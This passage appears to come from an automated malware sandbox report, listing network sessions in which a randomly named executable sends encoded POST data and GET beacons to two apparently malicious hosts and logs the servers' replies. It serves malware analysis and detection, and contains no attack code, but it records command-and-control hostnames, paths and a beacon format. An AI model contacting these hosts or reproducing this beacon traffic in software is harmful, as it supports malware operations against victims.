                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.54981338.54.112.227802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:13.684988976 CET720OUTPOST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 72 68 6b 42 67 61 47 34 56 69 67 46 54 47 62 34 4d 44 66 62 6c 4c 51 31 58 4c 62 41 31 42 64 30 75 67 74 72 49 37 45 34 53 78 6b 69 44 50 79 73 6c 6c 2f 4c 43 75 54 72 73 6d 43 51 66 52 78 6a 35 4f 54 74 46 2b 66 30 69 41 55 6b 6f 2f 48 7a 63 52 4a 6a 33 49 4f 62 4d 53 7a 59 6c 45 34 46 57 2b 67 48 67 77 33 63 68 50 43 6d 48 52 53 6d 32 77 68 34 4b 48 30 72 64 6e 49 69 76 6c 2b 34 55 2b 33 70 31 73 71 6d 66 35 77 6d 4e 63 76 57 36 4e 64 61 64 58 34 78 35 65 72 48 56 46 58 6f 79 66 76 41 4c 6f 76 63 33 36 37 6a 49 73 6d 47 74 39 35 42 37 54 4d 4f 42 34 63 3d
                                                                                          Data Ascii: 8z=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6NdadX4x5erHVFXoyfvALovc367jIsmGt95B7TMOB4c=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.54981938.54.112.227802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:16.410785913 CET740OUTPOST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 71 42 55 42 37 35 75 34 5a 53 67 43 50 57 62 34 65 44 65 7a 6c 4c 63 31 58 4b 66 51 31 79 35 30 75 46 4a 72 4a 2f 77 34 54 78 6b 69 58 2f 7a 6f 34 31 2f 4d 43 75 65 65 73 6e 75 51 66 53 4e 6a 35 4d 4c 74 46 4a 72 33 6a 51 55 6d 6b 66 48 39 43 68 4a 6a 33 49 4f 62 4d 53 6e 2b 6c 45 77 46 57 4e 34 48 67 53 66 54 69 50 43 6c 4f 78 53 6d 6e 67 68 38 4b 48 30 46 64 6d 55 63 76 6d 47 34 55 2b 48 70 32 39 71 6e 45 70 77 67 43 38 75 41 32 4f 6c 55 45 30 70 2b 37 74 71 77 47 31 69 54 33 70 65 71 52 4b 6e 30 6b 61 58 62 59 2f 75 78 38 4e 59 6f 68 77 63 2b 66 76 49 56 31 2f 44 77 68 6b 47 62 66 62 48 32 45 4d 6e 7a 5a 2f 4e 33
                                                                                          Data Ascii: 8z=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1y50uFJrJ/w4TxkiX/zo41/MCueesnuQfSNj5MLtFJr3jQUmkfH9ChJj3IObMSn+lEwFWN4HgSfTiPClOxSmngh8KH0FdmUcvmG4U+Hp29qnEpwgC8uA2OlUE0p+7tqwG1iT3peqRKn0kaXbY/ux8NYohwc+fvIV1/DwhkGbfbH2EMnzZ/N3
                                                                                          Nov 24, 2024 08:20:18.042802095 CET241INHTTP/1.1 200 OK
                                                                                          Content-Encoding: gzip
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Date: Sun, 24 Nov 2024 07:20:17 GMT
                                                                                          Server: nginx
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Length: 44
                                                                                          Connection: close
                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                                                          Data Ascii: KLIU(WHO-QHKM.g


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.54982838.54.112.227802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:19.121660948 CET1757OUTPOST /z9pi/ HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.jijievo.site
                                                                                          Referer: http://www.jijievo.site/z9pi/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 71 42 55 42 37 35 75 34 5a 53 67 43 50 57 62 34 65 44 65 7a 6c 4c 63 31 58 4b 66 51 31 79 78 30 75 32 78 72 49 59 73 34 42 42 6b 69 55 2f 7a 72 34 31 2f 52 43 75 57 61 73 6e 54 6c 66 55 42 6a 35 76 44 74 44 37 44 33 36 67 55 6d 35 50 48 77 63 52 49 68 33 4d 53 48 4d 53 33 2b 6c 45 77 46 57 49 30 48 6d 41 33 54 75 76 43 6d 48 52 53 36 32 77 68 59 4b 48 38 7a 64 6d 51 4d 6f 57 6d 34 55 65 58 70 77 50 53 6e 49 70 77 69 44 38 75 49 32 50 59 57 45 30 30 42 37 75 32 61 47 32 79 54 32 50 54 62 4e 70 2f 32 6c 62 6a 6e 4c 73 6d 64 6b 35 45 61 69 69 41 30 57 4e 59 79 70 2b 76 35 70 44 71 72 53 4c 53 35 61 6f 48 49 5a 61 41 43 41 39 36 5a 31 6e 59 4d 75 66 56 4b 58 78 6f 6f 51 36 75 43 7a 50 46 47 66 44 6a 4a 7a 46 4c 38 67 79 71 61 68 55 39 35 55 38 42 49 35 74 58 34 4f 4f 2b 58 75 4c 4c 52 53 63 42 57 66 65 56 33 78 51 51 7a 33 45 53 4d 39 6e 61 2b 70 79 7a 37 55 50 6c 69 33 2f 36 7a 4d 62 75 71 4d 6f 76 74 46 4c 4f 6a 49 4c 44 5a 56 49 63 54 6c 59 78 54 78 78 74 [TRUNCATED]
                                                                                          Data Ascii: 8z=vc1efZByy0/GqBUB75u4ZSgCPWb4eDezlLc1XKfQ1yx0u2xrIYs4BBkiU/zr41/RCuWasnTlfUBj5vDtD7D36gUm5PHwcRIh3MSHMS3+lEwFWI0HmA3TuvCmHRS62whYKH8zdmQMoWm4UeXpwPSnIpwiD8uI2PYWE00B7u2aG2yT2PTbNp/2lbjnLsmdk5EaiiA0WNYyp+v5pDqrSLS5aoHIZaACA96Z1nYMufVKXxooQ6uCzPFGfDjJzFL8gyqahU95U8BI5tX4OO+XuLLRScBWfeV3xQQz3ESM9na+pyz7UPli3/6zMbuqMovtFLOjILDZVIcTlYxTxxtLVyg07TfbBw9ezc66T3TE65FjWxB6yTp9pENyeVkeC7k3AW8e25iqNuV5B2Rl07BCu8+OJqKQuWvO+vPwxZPVRGrcV0zjPVbczIivP8Smm7jsofI1n0tJbcEBUXuUqKY/4fNMAsI/Kx68ePFD3EjT12QAoRA4jktrkzXd0BEgIiUi/b6EQGgyLRZmIXi8HONGfUlA7OViIMQZ9BpxRyMkQVNCpxp0TSwcTTRrKwy9a6VNtMYCG67wsOZQeizpLeyV4VjmxvdVzrYK6wSwuvA13SnEH3xe2gdLW+9TZGrIlTnIvVuXpaJityln1Xe96NpV1Fb5z9q2yG+t3EvM8XJNHBFYsDbDAKSLzmsqELxWnAxdNpSk7QKBM3eOHhhwygTUupRHHfatEXeLUNMv3hai9vaOC7FCp/XuVRQWvQfLWSQjt9kG7aBtEGRDf+ZbZ/QyfdB2sLZwRJrYUrF1PZ/CYpA7+hMBq0cEkUmLL5UBMKE8pW6sU2MSR1nJXj4LFZWoW3bblsGM4guMl7Gxio1cg3Kw0cEGQUk2m4WyWqMzWTgxqGtYmryuy4IcTy4EcjaF6eCwFgphPGigx5Iqu1NKHEBMWNn0FaNQKPiQr0l1j1Tl/A8/lZhKvGClvGfXXcHwKpiOe1qoGspIu9PdW5pQXu/zSygjTeysq [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.54983638.54.112.227802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:21.777203083 CET472OUTGET /z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.jijievo.site
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:20:23.425554991 CET197INHTTP/1.1 200 OK
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Date: Sun, 24 Nov 2024 07:20:23 GMT
                                                                                          Server: nginx
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Length: 24
                                                                                          Connection: close
                                                                                          Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                                                          Data Ascii: Unable to get connection


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.54985247.76.213.197802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:29.528562069 CET714OUTPOST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 4e 6d 73 45 6e 69 5a 4c 62 6a 43 35 65 4c 68 42 78 48 77 53 6f 6c 58 70 67 5a 78 36 61 2f 5a 64 49 72 59 58 42 49 3d
                                                                                          Data Ascii: 8z=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffNmsEniZLbjC5eLhBxHwSolXpgZx6a/ZdIrYXBI=
                                                                                          Nov 24, 2024 08:20:31.112967014 CET574INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.54985847.76.213.197802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:32.187596083 CET734OUTPOST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 4a 76 35 7a 52 47 72 71 65 77 48 72 37 6f 4a 57 64 2f 45 37 37 4d 71 7a 31 68 4e 4e 56 6b 2f 36 51 32 78 50 75 47
                                                                                          Data Ascii: 8z=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIJv5zRGrqewHr7oJWd/E77Mqz1hNNVk/6Q2xPuG
                                                                                          Nov 24, 2024 08:20:33.758474112 CET574INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:33 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.54986847.76.213.197802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:34.846443892 CET1751OUTPOST /8qt7/ HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.ytsd88.top
                                                                                          Referer: http://www.ytsd88.top/8qt7/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 62 49 31 73 37 4c 45 33 62 51 63 4c 70 32 37 78 39 58 32 64 47 73 4d 39 79 53 57 57 4e 78 49 2f 54 37 2f 6e 4e 48 42 2f 45 65 67 37 51 42 2b 61 2f 31 50 4c 6b 69 5a 67 37 6f 51 6c 42 35 44 48 6b 42 41 6d 4d 65 69 62 32 4f 50 55 55 46 47 2b 79 6f 37 30 42 72 7a 6b 71 79 63 6f 53 47 44 50 6b 45 69 4b 54 75 64 73 68 34 47 4a 6e 6a 49 48 65 46 54 34 72 59 51 6d 33 58 43 49 57 6d 62 72 30 4d 66 4e 59 62 79 66 51 56 56 67 6e 39 63 54 2f 41 6b 4a 42 32 46 6f 44 38 77 79 57 50 34 6f 77 4b 4c 39 33 [TRUNCATED]
                                                                                          Data Ascii: 8z=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6drWC9I9Df8kmZTfRoycMVAEMv45Ce8UJJqCbZVhinQgX3LdjAHUwNIbRQSXZkEsXaUAfl2HdZXIlKSPBZAkNVJ+lDmqU+NgwcAjGLoNFcuWs2M8gOXXgrD3Rf+W1ImLuLYbI1s7LE3bQcLp27x9X2dGsM9ySWWNxI/T7/nNHB/Eeg7QB+a/1PLkiZg7oQlB5DHkBAmMeib2OPUUFG+yo70BrzkqycoSGDPkEiKTudsh4GJnjIHeFT4rYQm3XCIWmbr0MfNYbyfQVVgn9cT/AkJB2FoD8wyWP4owKL93oqKzPjQKjTFrieUzNFlPQQuatsRrn/sbjRHxGx/fhvY3W59e/piC7+NM4PsuVjRvWOjtMj6PFqDKfJVFTasagVejZ9inRknxfqXZ1FxlS6+iYQdzY6ssfMyndbPoapFGjc2iocmljsRV3kPxtkdLpBJNOSOOrlmxi2GyJ4LIwOmpvpgnP5z4VnJ0IzGR97gnZ9gcQOBu4rdXBZOZ3AH9tNyzD2U0V9iVMpDoDlBl5rDFrWdn+CN9GVvMeC22yTxpS/jUgUQvB7vT1RuaLJ+Ve/sbl9wmvRab7kBUuckgZ7wyw79VNm5k7h9ThCc08Bqnsh3iK7G8JFYt2yHtnqcSgEKKxmqoSyxvuoMl1dl8moX57osabaPB0v4sJ72tdBF3G9LwYrDzCZioIGFYtZY9m43GffH8p9LjAEPQaMlb98Jwp3T7FcVeFZMJrPAd7h74sNgb/82bUa76zI2MfexSC9MkIS8Y1PQKVrlkDLoV1SE5T7M7zt7cskSAC3wE2GWU2xNn+jd0SCF4+4LJd1YsYzS19rCOcle8ESAOYwjet+T+2nbjE7p3L8856LrMOGv0EnJcX5HFGD4S81cp7uB0+Eu602q/MPxyS3X9EwyANLCKjPmjMEKsT93AM6FtCCgnHLwSEpaUStt6oscbuxC+X09ZdYH1q4orQY [TRUNCATED]
                                                                                          Nov 24, 2024 08:20:36.391530037 CET574INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:20:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 409
                                                                                          Connection: close
                                                                                          ETag: "66d016cf-199"
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                                          Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.54987547.76.213.197802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:20:37.511085033 CET470OUTGET /8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.ytsd88.top
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
